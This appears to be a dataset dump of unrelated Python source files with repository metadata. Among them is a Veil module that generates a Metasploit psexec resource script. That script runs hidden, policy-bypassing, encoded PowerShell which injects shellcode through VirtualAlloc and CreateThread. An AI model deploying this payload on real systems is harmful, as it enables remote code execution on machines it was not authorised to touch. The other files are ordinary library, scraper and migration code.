corofunc = _ensure_coroutine_function(corofunc)
def f(seed_tuple):
return corofunc(seed_tuple, *args, **kwargs)
return f
def create_run(cls, *args, **kwargs):
"""
:return:
a delegator function that calls the ``cls`` constructor whose arguments being
a seed tuple followed by supplied ``*args`` and ``**kwargs``, then returns
a coroutine object by calling the object's ``run`` method, which should be
a coroutine function.
"""
def f(seed_tuple):
j = cls(seed_tuple, *args, **kwargs)
return _ensure_coroutine_function(j.run)()
return f
def create_open(cls, *args, **kwargs):
"""
:return:
a delegator function that calls the ``cls`` constructor whose arguments being
a seed tuple followed by supplied ``*args`` and ``**kwargs``, then returns
a looping coroutine object that uses the object's ``listener`` to wait for
messages and invokes instance method ``open``, ``on_message``, and ``on_close``
accordingly.
"""
def f(seed_tuple):
j = cls(seed_tuple, *args, **kwargs)
async def wait_loop():
bot, msg, seed = seed_tuple
try:
handled = await helper._yell(j.open, msg, seed)
if not handled:
await helper._yell(j.on_message, msg)
while 1:
msg = await j.listener.wait()
await helper._yell(j.on_message, msg)
# These exceptions are "normal" exits.
except (exception.IdleTerminate, exception.StopListening) as e:
await helper._yell(j.on_close, e)
# Any other exceptions are accidents. **Print it out.**
# This is to prevent swallowing exceptions in the case that on_close()
# gets overridden but fails to account for unexpected exceptions.
except Exception as e:
traceback.print_exc()
await helper._yell(j.on_close, e)
return wait_loop()
return f
|
mit
| -7,109,834,925,645,704,000
| 35
| 87
| 0.643915
| false
| 3.757455
| false
| false
| false
|
rentlytics/django-zerodowntime
|
zerodowntime/management/commands/install_git_hooks.py
|
1
|
1517
|
import os
import stat
from django.core.management import BaseCommand
COMMIT_MSG_HOOK = """
# BEGIN ZERODOWNTIME_COMMIT_MSG_HOOK
commit_regex='(\[allow\-unsafe\-migrations]|merge)'
if ! grep -iqE "$commit_regex" "$1"; then
source ./venv/bin/activate
./manage.py check_migrations
migration_check=$?
if [ $migration_check != 0 ]; then
echo "Aborting commit, caused by migrations incompatible with ZDCD." >&2
echo "To skip this check you can add '[allow-unsafe-migrations]' to your commit message." >&2
exit $migration_check
fi;
fi;
# END ZERODOWNTIME_COMMIT_MSG_HOOK
"""
class Command(BaseCommand):
help = 'Installs a git commit-msg hook which will ' \
'execute `./manage.py check_migrations` unless ' \
'the commit message contains "[allow-unsafe-migrations]"'
HOOK_PATH = '.git/hooks/'
def handle(self, *args, **options):
commit_msg_path = os.path.join(self.HOOK_PATH, 'commit-msg')
hook_exists = os.path.exists(commit_msg_path)
if hook_exists:
with open(commit_msg_path, 'r') as fp:
hook_content = fp.read()
else:
hook_content = '#!/usr/bin/env bash\n\n'
if 'ZERODOWNTIME_COMMIT_MSG_HOOK' not in hook_content:
hook_content += COMMIT_MSG_HOOK
with open(commit_msg_path, 'w') as fp:
fp.write(hook_content)
st = os.stat(commit_msg_path)
os.chmod(commit_msg_path, st.st_mode | stat.S_IEXEC)
|
isc
| -4,212,104,457,324,079,600
| 28.745098
| 99
| 0.616348
| false
| 3.503464
| false
| false
| false
|
lishubing/zhihu-py3
|
zhihu/topic.py
|
1
|
3749
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = '7sDream'
from .common import *
class Topic:
"""答案类,请使用``ZhihuClient.topic``方法构造对象."""
@class_common_init(re_topic_url)
def __init__(self, url, name=None, session=None):
"""创建话题类实例.
:param url: 话题url
:param name: 话题名称,可选
:return: Topic
"""
self.url = url
self._session = session
self._name = name
def _make_soup(self):
if self.soup is None:
self.soup = BeautifulSoup(self._session.get(self.url).content)
@property
@check_soup('_name')
def name(self):
"""获取话题名称.
:return: 话题名称
:rtype: str
"""
return self.soup.find('h1').text
@property
@check_soup('_follower_num')
def follower_num(self):
"""获取话题关注人数.
:return: 关注人数
:rtype: int
"""
follower_num_block = self.soup.find(
'div', class_='zm-topic-side-followers-info')
# 无人关注时 找不到对应block,直接返回0 (感谢知乎用户 段晓晨 提出此问题)
if follower_num_block.strong is None:
return 0
return int(follower_num_block.strong.text)
@property
@check_soup('_photo_url')
def photo_url(self):
"""获取话题头像图片地址.
:return: 话题头像url
:rtype: str
"""
if self.soup is not None:
img = self.soup.find('a', id='zh-avartar-edit-form').img['src']
return img.replace('_m', '_r')
@property
@check_soup('_description')
def description(self):
"""获取话题描述信息.
:return: 话题描述信息
:rtype: str
"""
if self.soup is not None:
desc = self.soup.find('div', class_='zm-editable-content').text
return desc
@property
@check_soup('_top_answers')
def top_answers(self):
"""获取话题下的精华答案.
:return: 话题下的精华答案,返回生成器.
:rtype: Answer.Iterable
"""
from .question import Question
from .answer import Answer
from .author import Author
if self.url is None:
return
for page_index in range(1, 50):
html = self._session.get(
self.url + 'top-answers?page=' + str(page_index)).text
soup = BeautifulSoup(html)
if soup.find('div', class_='error') != None:
return
questions = soup.find_all('a', class_='question_link')
answers = soup.find_all(
'a', class_=re.compile(r'answer-date-link.*'))
authors = soup.find_all('h3', class_='zm-item-answer-author-wrap')
upvotes = soup.find_all('a', class_='zm-item-vote-count')
for ans, up, q, au in zip(answers, upvotes, questions, authors):
answer_url = Zhihu_URL + ans['href']
question_url = Zhihu_URL + q['href']
question_title = q.text
upvote = int(up['data-votecount'])
question = Question(question_url, question_title,
session=self._session)
if au.text == '匿名用户':
author = Author(None, name='匿名用户', session=self._session)
else:
author_url = Zhihu_URL + au.a['href']
author = Author(author_url, session=self._session)
yield Answer(answer_url, question, author, upvote,
session=self._session)
|
mit
| 1,154,990,247,466,391,800
| 28.615385
| 78
| 0.516883
| false
| 3.158614
| false
| false
| false
|
gems-uff/noworkflow
|
capture/noworkflow/now/ipython/__init__.py
|
1
|
1194
|
# Copyright (c) 2016 Universidade Federal Fluminense (UFF)
# Copyright (c) 2016 Polytechnic Institute of New York University.
# This file is part of noWorkflow.
# Please, consult the license terms in the LICENSE file.
"""IPython Module"""
from __future__ import (absolute_import, print_function,
division)
from ..persistence.models import * # pylint: disable=wildcard-import
from ..persistence import persistence_config, relational, content
def init(path=None, ipython=None):
"""Initiate noWorkflow extension.
Load D3, IPython magics, and connect to database
Keyword Arguments:
path -- database path (default=current directory)
ipython -- IPython object (default=None)
"""
import os
from .magics import register_magics
try:
from .hierarchymagic import load_ipython_extension as load_hierarchy
load_hierarchy(ipython)
except ImportError:
print("Warning: Sphinx is not installed. Dot "
"graphs won't work")
register_magics(ipython)
if path is None:
path = os.getcwd()
persistence_config.connect(path)
return u"ok"
|
mit
| -3,581,050,087,282,086,000
| 29.615385
| 114
| 0.659966
| false
| 4.234043
| false
| false
| false
|
bartekbp/intelidzentaj
|
choregraphe-dir/personRecognizerProxy.py
|
1
|
2453
|
import httplib
import random
import string
import sys
import mimetypes
import urllib2
import httplib
import time
import re
def random_string(length):
return ''.join(random.choice(string.letters) for ii in range(length + 1))
def encode_multipart_data(data, files, binary):
boundary = random_string(30)
def get_content_type(filename):
return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
def encode_field(field_name):
return ('--' + boundary,
'Content-Disposition: form-data; name="%s"' % field_name,
'', str(data[field_name]))
def encode_file(field_name):
filename = files[field_name]
return ('--' + boundary,
'Content-Disposition: form-data; name="%s"; filename="%s"' % (field_name, filename),
'Content-Type: %s' % get_content_type(filename),
'', open(filename, 'rb').read())
def encode_binary(field_name):
return ('--' + boundary,
'Content-Disposition: form-data; name="%s"; filename="%s"' % (field_name, field_name),
'Content-Type: image/jpeg',
'', binary[field_name])
lines = []
for name in data:
lines.extend(encode_field(name))
for name in files:
lines.extend(encode_file(name))
for name in binary:
lines.extend(encode_binary(name))
lines.extend(('--%s--' % boundary, ''))
body = '\r\n'.join(lines)
headers = {'content-type': 'multipart/form-data; boundary=' + boundary,
'content-length': str(len(body))}
return body, headers
def send_post(url, data, files, binary):
req = urllib2.Request(url)
connection = httplib.HTTPConnection(req.get_host())
connection.request('POST', req.get_selector(),
*encode_multipart_data(data, files, binary))
response = connection.getresponse()
if response.status != 200:
return "bad response code"
return response.read()
class PersonRecognizerProxy(object):
def __init__(self, address):
self.address = address
def recognize_person(self, image):
return send_post(self.address, {}, {}, {"img":image})
"""
import personRecognizerProxy
personRec = personRecognizerProxy.PersonRecognizerProxy("")
"""
|
mit
| -1,507,222,798,856,588,800
| 29.050633
| 102
| 0.576845
| false
| 3.995114
| false
| false
| false
|
google/dl_bounds
|
dl_bounds/src/experiments/exp_sharpness.py
|
1
|
3102
|
# coding=utf-8
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implements experimental logic."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from dl_bounds.src.data import LocalDatasetProvider
from dl_bounds.src.experiments.exp_base import Experiment
import numpy as np
import tensorflow as tf
class SharpnessExperiment(Experiment):
"""Computes sharpness complexity measure.
Sharpness described in:
N. S. Keskar, D. Mudigere, J. Nocedal, M. Smelyanskiy,
and P. T. P. Tang. On large-batch training
for deep learning: Generalization gap and sharp minima.
In ICLR 2017.
"""
def run(self):
"""Runs experiment."""
if self.exists():
tf.logging.info("Result file already exists.")
return
(x_train, y_train, x_val, y_val, _) = self.get_data()
m = x_train.shape[0]
tf.logging.info("Training set size = %d", m)
tf.logging.info("Val set size = %d", x_val.shape[0])
train_dataset = LocalDatasetProvider(
x_train, y_train, shuffle_seed=self.conf.data_shuffle_seed)
val_dataset = LocalDatasetProvider(
x_val, y_val, shuffle_seed=self.conf.data_shuffle_seed)
sharpness_dataset = LocalDatasetProvider(
x_train, y_train, shuffle_seed=self.conf.data_shuffle_seed)
n_records = self.get_n_records()
# Constants as in the paper describing sharpness measure
alpha_range = [5e-4, 1e-3, 1e-2]
n_alpha = len(alpha_range)
sharpness = np.zeros((n_records, n_alpha))
tf.logging.info("Computing sharpness on alpha=%s", ", ".join(
map(str, alpha_range)))
for (pass_index, (p, model)) in enumerate(self.train(train_dataset)):
self.measure_on_train_val(train_dataset, val_dataset, pass_index, p,
model)
self.report_train_val(pass_index)
for (i_alpha, alpha) in enumerate(alpha_range):
sharpness[pass_index, i_alpha] = model.sharpness(
sharpness_dataset,
batch_size=self.conf.batch_size,
learning_rate=self.conf.learning_rate,
init_stddev=self.conf.init_stddev,
passes=10,
optimizer=self.conf.optimizer,
alpha=alpha)
tf.logging.info(
"Sharpness (alpha=%s): %s", alpha,
", ".join(
["%.2f" % x for x in sharpness[:pass_index+1, i_alpha]]))
results = self.get_train_val_measurements()
results.update(dict(sharpness=sharpness, alpha=alpha_range))
self.save(results)
return results
|
apache-2.0
| -123,532,413,234,264,400
| 32.717391
| 74
| 0.661186
| false
| 3.517007
| false
| false
| false
|
ITOO-UrFU/open-programs
|
open_programs/apps/programs/migrations/0001_initial.py
|
1
|
12004
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-05-02 09:11
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
initial = True
dependencies = [
('competences', '__first__'),
('persons', '0001_initial'),
('modules', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='ChoiceGroup',
fields=[
('archived', models.BooleanField(default=False, verbose_name='В архиве')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Дата создания')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Обновлен')),
('status', models.CharField(choices=[('h', 'Скрыт'), ('p', 'Опубликован')], default='h', max_length=1, verbose_name='Статус публикации')),
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('title', models.CharField(default='', max_length=2048, verbose_name='Наименование группы выбора')),
('labor', models.IntegerField(default=3, verbose_name='Трудоёмкость группы')),
('number', models.IntegerField(verbose_name='Номер группы выбора')),
],
options={
'verbose_name': 'группа выбора',
'verbose_name_plural': 'группы выбора',
},
),
migrations.CreateModel(
name='ChoiceGroupType',
fields=[
('archived', models.BooleanField(default=False, verbose_name='В архиве')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Дата создания')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Обновлен')),
('status', models.CharField(choices=[('h', 'Скрыт'), ('p', 'Опубликован')], default='h', max_length=1, verbose_name='Статус публикации')),
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('title', models.CharField(default='', max_length=2048, verbose_name='Наименование типы группы выбора')),
],
options={
'verbose_name': 'тип группы выбора',
'verbose_name_plural': 'типы группы выбора',
},
),
migrations.CreateModel(
name='LearningPlan',
fields=[
('archived', models.BooleanField(default=False, verbose_name='В архиве')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Дата создания')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Обновлен')),
('status', models.CharField(choices=[('h', 'Скрыт'), ('p', 'Опубликован')], default='h', max_length=1, verbose_name='Статус публикации')),
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('uni_displayableTitle', models.CharField(blank=True, max_length=32, null=True, verbose_name='Версия')),
('uni_number', models.CharField(blank=True, max_length=32, null=True, verbose_name='Номер УП')),
('uni_active', models.CharField(blank=True, max_length=32, null=True, verbose_name='Текущая версия')),
('uni_title', models.CharField(blank=True, max_length=32, null=True, verbose_name='Название')),
('uni_stage', models.BooleanField(default=True, verbose_name='План утверждён')),
('uni_loadTimeType', models.CharField(blank=True, max_length=32, null=True, verbose_name='Единица измерения нагрузки')),
('uni_html', models.TextField(blank=True, null=True)),
],
options={
'verbose_name': 'учебный план',
'verbose_name_plural': 'учебные планы',
},
),
migrations.CreateModel(
name='Program',
fields=[
('archived', models.BooleanField(default=False, verbose_name='В архиве')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Дата создания')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Обновлен')),
('status', models.CharField(choices=[('h', 'Скрыт'), ('p', 'Опубликован')], default='h', max_length=1, verbose_name='Статус публикации')),
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('level', models.CharField(choices=[('b', 'бакалавриат'), ('m', 'магистратура'), ('s', 'специалитет')], default='b', max_length=1, verbose_name='Уровень программы')),
('title', models.CharField(default='', max_length=256, verbose_name='Наименование образовательной программы')),
('training_direction', models.CharField(default='', max_length=256, verbose_name='Направление подготовки')),
('chief', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='persons.Person', verbose_name='Руководитель образовательной программы')),
('competences', models.ManyToManyField(blank=True, to='competences.Competence')),
('learning_plans', models.ManyToManyField(blank=True, to='programs.LearningPlan')),
],
options={
'verbose_name': 'программа',
'verbose_name_plural': 'программы',
},
),
migrations.CreateModel(
name='ProgramCompetence',
fields=[
('archived', models.BooleanField(default=False, verbose_name='В архиве')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Дата создания')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Обновлен')),
('status', models.CharField(choices=[('h', 'Скрыт'), ('p', 'Опубликован')], default='h', max_length=1, verbose_name='Статус публикации')),
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('title', models.CharField(default='', max_length=2048, verbose_name='Наименование компетенции')),
('number', models.IntegerField(verbose_name='Номер компетенции')),
],
options={
'verbose_name': 'компетенция программы',
'verbose_name_plural': 'компетенции программы',
},
),
migrations.CreateModel(
name='ProgramModules',
fields=[
('archived', models.BooleanField(default=False, verbose_name='В архиве')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Дата создания')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Обновлен')),
('status', models.CharField(choices=[('h', 'Скрыт'), ('p', 'Опубликован')], default='h', max_length=1, verbose_name='Статус публикации')),
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('semester', models.PositiveIntegerField(blank=True, null=True)),
('choice_group', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='programs.ChoiceGroup')),
('competence', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='programs.ProgramCompetence')),
('module', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='modules.Module')),
('program', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='programs.Program')),
],
options={
'verbose_name': 'модуль программы',
'verbose_name_plural': 'модули программы',
},
),
migrations.CreateModel(
name='TargetModules',
fields=[
('archived', models.BooleanField(default=False, verbose_name='В архиве')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Дата создания')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Обновлен')),
('status', models.CharField(choices=[('h', 'Скрыт'), ('p', 'Опубликован')], default='h', max_length=1, verbose_name='Статус публикации')),
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('choice_group', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='programs.ChoiceGroup')),
('program_module', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='programs.ProgramModules')),
],
options={
'verbose_name': 'модуль цели',
'verbose_name_plural': 'модули цели',
},
),
migrations.CreateModel(
name='TrainingTarget',
fields=[
('archived', models.BooleanField(default=False, verbose_name='В архиве')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Дата создания')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Обновлен')),
('status', models.CharField(choices=[('h', 'Скрыт'), ('p', 'Опубликован')], default='h', max_length=1, verbose_name='Статус публикации')),
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('title', models.CharField(default='', max_length=256, verbose_name='Наименование образовательной цели')),
('number', models.IntegerField(verbose_name='Порядковый номер цели')),
('program', models.ManyToManyField(to='programs.Program')),
],
options={
'verbose_name': 'образовательная цель',
'verbose_name_plural': 'образовательные цели',
},
),
migrations.AddField(
model_name='targetmodules',
name='target',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='programs.TrainingTarget'),
),
migrations.AddField(
model_name='choicegroup',
name='choice_group_type',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='programs.ChoiceGroupType'),
),
migrations.AddField(
model_name='choicegroup',
name='program',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='programs.Program'),
),
]
|
unlicense
| -2,469,500,295,048,216,000
| 60.683616
| 189
| 0.588478
| false
| 3.264952
| false
| false
| false
|
d3m3vilurr/Veil
|
modules/payloads/powershell/psPsexecVirtualAlloc.py
|
1
|
2739
|
"""
Powershell method to inject inline shellcode.
Builds a metasploit .rc resource file to psexec the powershell command easily
Original concept from Matthew Graeber: http://www.exploit-monday.com/2011/10/exploiting-powershells-features-not.html
Note: the architecture independent invoker was developed independently from
https://www.trustedsec.com/may-2013/native-powershell-x86-shellcode-injection-on-64-bit-platforms/
Port to the msf resource file by @the_grayhound
"""
from modules.common import shellcode
from modules.common import helpers
class Stager:
def __init__(self):
# required
self.shortname = "PsexecVirtualAlloc"
self.description = "PowerShell VirtualAlloc method for inline shellcode injection that makes a Metasploit psexec_command .rc script"
self.rating = "Excellent"
self.language = "powershell"
self.extension = "rc"
self.shellcode = shellcode.Shellcode()
def psRaw(self):
Shellcode = self.shellcode.generate()
Shellcode = ",0".join(Shellcode.split("\\"))[1:]
baseString = """$c = @"
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z);
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z);
[DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr x, uint y, uint z);
"@
$o = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru
$x=$o::VirtualAlloc(0,0x1000,0x3000,0x40); [Byte[]]$sc = %s;
for ($i=0;$i -le ($sc.Length-1);$i++) {$o::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1) | out-null;}
$z=$o::CreateThread(0,0,$x,0,0,0); Start-Sleep -Second 100000""" % (Shellcode)
return baseString
def generate(self):
encoded = helpers.deflate(self.psRaw())
rcScript = "use auxiliary/admin/smb/psexec_command\n"
rcScript += "set COMMAND "
rcScript += "if %PROCESSOR_ARCHITECTURE%==x86 ("
rcScript += "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command \\\"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\\\\\\\"%s\\\\\\\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();\\\"" % (encoded)
rcScript += ") else ("
rcScript += "%%WinDir%%\\\\syswow64\\\\windowspowershell\\\\v1.0\\\\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command \\\"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\\\\\\\"%s\\\\\\\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();\\\")" % (encoded)
return rcScript
|
gpl-3.0
| 6,437,733,450,173,481,000
| 45.423729
| 411
| 0.706462
| false
| 3.05692
| false
| false
| false
|
Artemkaaas/indy-sdk
|
vcx/wrappers/python3/vcx/api/issuer_credential.py
|
1
|
17127
|
from ctypes import *
from vcx.common import do_call, create_cb
from vcx.api.connection import Connection
from vcx.api.vcx_stateful import VcxStateful
import json
class IssuerCredential(VcxStateful):
"""
The object of the VCX API representing an Issuer side in the credential issuance process.
Assumes that pairwise connection between Issuer and Holder is already established.
# State
The set of object states and transitions depends on communication method is used.
The communication method can be specified as config option on one of *_init function. The default communication method us `proprietary`.
proprietary:
VcxStateType::VcxStateInitialized - once `vcx_issuer_create_credential` (create IssuerCredential object) is called.
VcxStateType::VcxStateOfferSent - once `vcx_issuer_send_credential_offer` (send `CRED_OFFER` message) is called.
VcxStateType::VcxStateRequestReceived - once `CRED_REQ` messages is received.
use `vcx_issuer_credential_update_state` or `vcx_issuer_credential_update_state_with_message` functions for state updates.
VcxStateType::VcxStateAccepted - once `vcx_issuer_send_credential` (send `CRED` message) is called.
aries:
VcxStateType::VcxStateInitialized - once `vcx_issuer_create_credential` (create IssuerCredential object) is called.
VcxStateType::VcxStateOfferSent - once `vcx_issuer_send_credential_offer` (send `CredentialOffer` message) is called.
VcxStateType::VcxStateRequestReceived - once `CredentialRequest` messages is received.
VcxStateType::None - once `ProblemReport` messages is received.
use `vcx_issuer_credential_update_state` or `vcx_issuer_credential_update_state_with_message` functions for state updates.
VcxStateType::VcxStateAccepted - once `vcx_issuer_send_credential` (send `Credential` message) is called.
# Transitions
proprietary:
VcxStateType::None - `vcx_issuer_create_credential` - VcxStateType::VcxStateInitialized
VcxStateType::VcxStateInitialized - `vcx_issuer_send_credential_offer` - VcxStateType::VcxStateOfferSent
VcxStateType::VcxStateOfferSent - received `CRED_REQ` - VcxStateType::VcxStateRequestReceived
VcxStateType::VcxStateRequestReceived - `vcx_issuer_send_credential` - VcxStateType::VcxStateAccepted
aries: RFC - https://github.com/hyperledger/aries-rfcs/tree/7b6b93acbaf9611d3c892c4bada142fe2613de6e/features/0036-issue-credential
VcxStateType::None - `vcx_issuer_create_credential` - VcxStateType::VcxStateInitialized
VcxStateType::VcxStateInitialized - `vcx_issuer_send_credential_offer` - VcxStateType::VcxStateOfferSent
VcxStateType::VcxStateOfferSent - received `CredentialRequest` - VcxStateType::VcxStateRequestReceived
VcxStateType::VcxStateOfferSent - received `ProblemReport` - VcxStateType::None
VcxStateType::VcxStateRequestReceived - vcx_issuer_send_credential` - VcxStateType::VcxStateAccepted
VcxStateType::VcxStateAccepted - received `Ack` - VcxStateType::VcxStateAccepted
# Messages
proprietary:
CredentialOffer (`CRED_OFFER`)
CredentialRequest (`CRED_REQ`)
Credential (`CRED`)
aries:
CredentialProposal - https://github.com/hyperledger/aries-rfcs/tree/7b6b93acbaf9611d3c892c4bada142fe2613de6e/features/0036-issue-credential#propose-credential
CredentialOffer - https://github.com/hyperledger/aries-rfcs/tree/7b6b93acbaf9611d3c892c4bada142fe2613de6e/features/0036-issue-credential#offer-credential
CredentialRequest - https://github.com/hyperledger/aries-rfcs/tree/7b6b93acbaf9611d3c892c4bada142fe2613de6e/features/0036-issue-credential#request-credential
Credential - https://github.com/hyperledger/aries-rfcs/tree/7b6b93acbaf9611d3c892c4bada142fe2613de6e/features/0036-issue-credential#issue-credential
ProblemReport - https://github.com/hyperledger/aries-rfcs/tree/7b6b93acbaf9611d3c892c4bada142fe2613de6e/features/0035-report-problem#the-problem-report-message-type
Ack - https://github.com/hyperledger/aries-rfcs/tree/master/features/0015-acks#explicit-acks
"""
def __init__(self, source_id: str, attrs: dict, cred_def_id: str, name: str, price: float):
VcxStateful.__init__(self, source_id)
self._cred_def_id = cred_def_id
self._attrs = attrs
self._name = name
self._price = price
def __del__(self):
self.release()
self.logger.debug("Deleted {} obj: {}".format(IssuerCredential, self.handle))
@staticmethod
async def create(source_id: str, attrs: dict, cred_def_handle: int, name: str, price: str):
"""
Create a Issuer Credential object that provides a credential for an enterprise's user
Assumes a credential definition has been already written to the ledger.
:param source_id: Tag associated by user of sdk
:param attrs: attributes that will form the credential
:param cred_def_handle: Handle from previously created credential def object
:param name: Name given to the Credential
:param price: Price, in tokens, required as payment for the issuance of the credential.
Example:
source_id = '1'
cred_def_handle = 1
attrs = {'key': 'value', 'key2': 'value2', 'key3': 'value3'}
name = 'Credential Name'
issuer_did = '8XFh8yBzrpJQmNyZzgoTqB'
phone_number = '8019119191'
price = 1
issuer_credential = await IssuerCredential.create(source_id, attrs, cred_def_handle, name, price)
"""
constructor_params = (source_id, attrs, cred_def_handle, name, price)
c_source_id = c_char_p(source_id.encode('utf-8'))
c_cred_def_handle = c_uint32(cred_def_handle)
c_price = c_char_p(price.encode('utf-8'))
# default institution_did in config is used as issuer_did
c_issuer_did = None
c_data = c_char_p(json.dumps(attrs).encode('utf-8'))
c_name = c_char_p(name.encode('utf-8'))
c_params = (c_source_id, c_cred_def_handle, c_issuer_did, c_data, c_name, c_price)
return await IssuerCredential._create("vcx_issuer_create_credential",
constructor_params,
c_params)
@staticmethod
async def deserialize(data: dict):
"""
Create a IssuerCredential object from a previously serialized object
:param data: dict representing a serialized IssuerCredential Object
:return: IssuerCredential object
Example:
source_id = '1'
cred_def_id = 'cred_def_id1'
attrs = {'key': 'value', 'key2': 'value2', 'key3': 'value3'}
name = 'Credential Name'
issuer_did = '8XFh8yBzrpJQmNyZzgoTqB'
phone_number = '8019119191'
price = 1
issuer_credential = await IssuerCredential.create(source_id, attrs, cred_def_id, name, price)
data = await issuer_credential.serialize()
issuer_credential2 = await IssuerCredential.deserialize(data)
"""
issuer_credential = await IssuerCredential._deserialize("vcx_issuer_credential_deserialize",
json.dumps(data),
data.get('data').get('source_id'),
data.get('data').get('price'),
data.get('data').get('credential_attributes'),
data.get('data').get('schema_seq_no'),
data.get('data').get('credential_request'))
return issuer_credential
async def serialize(self) -> dict:
"""
Serializes the issuer credential object for storage and later deserialization.
Example:
source_id = '1'
cred_def_id = 'cred_def_id1'
attrs = {'key': 'value', 'key2': 'value2', 'key3': 'value3'}
name = 'Credential Name'
issuer_did = '8XFh8yBzrpJQmNyZzgoTqB'
phone_number = '8019119191'
price = 1
issuer_credential = await IssuerCredential.create(source_id, attrs, cred_def_id, name, price)
data = await issuer_credential.serialize()
:return: dictionary representing the serialized object
"""
return await self._serialize(IssuerCredential, 'vcx_issuer_credential_serialize')
async def update_state(self) -> int:
"""
Query the agency for the received messages.
Checks for any messages changing state in the object and updates the state attribute.
Example:
issuer_credential = await IssuerCredential.create(source_id, attrs, cred_def_id, name, price)
issuer_credential.update_state()
:return:
"""
return await self._update_state(IssuerCredential, 'vcx_issuer_credential_update_state')
async def update_state_with_message(self, message: str) -> int:
"""
Update the state of the credential based on the given message.
Example:
cred = await IssuerCredential.create(source_id)
assert await cred.update_state_with_message(message) == State.Accepted
:param message: message to process for state changes
:return Current state of the IssuerCredential
"""
return await self._update_state_with_message(IssuerCredential, message, 'vcx_issuer_credential_update_state_with_message')
async def get_state(self) -> int:
"""
Get the current state of the issuer credential object
Example:
issuer_credential = await IssuerCredential.create(source_id, attrs, cred_def_id, name, price)
issuer_credential.update_state()
:return: State of the Object. Possible states:
1 - Initialized
2 - Offer Sent
3 - Request Received
4 - Issued
"""
return await self._get_state(IssuerCredential, 'vcx_issuer_credential_get_state')
def release(self) -> None:
"""
Used to release memory associated with this object, used by the c library.
:return:
"""
self._release(IssuerCredential, 'vcx_issuer_credential_release')
async def send_offer(self, connection: Connection):
"""
Send a credential offer to a holder showing what will be included in the actual credential
:param connection: Connection that identifies pairwise connection
:return: None
Example:
source_id = '1'
cred_def_id = 'cred_def_id1'
attrs = {'key': 'value', 'key2': 'value2', 'key3': 'value3'}
name = 'Credential Name'
issuer_did = '8XFh8yBzrpJQmNyZzgoTqB'
phone_number = '8019119191'
price = 1
issuer_credential = await IssuerCredential.create(source_id, attrs, cred_def_id, name, price)
connection = await Connection.create(source_id)
issuer_credential.send_offer(connection)
"""
if not hasattr(IssuerCredential.send_offer, "cb"):
self.logger.debug("vcx_issuer_send_credential_offer: Creating callback")
IssuerCredential.send_offer.cb = create_cb(CFUNCTYPE(None, c_uint32, c_uint32))
c_credential_handle = c_uint32(self.handle)
c_connection_handle = c_uint32(connection.handle)
await do_call('vcx_issuer_send_credential_offer',
c_credential_handle,
c_connection_handle,
IssuerCredential.send_offer.cb)
async def get_offer_msg(self):
"""
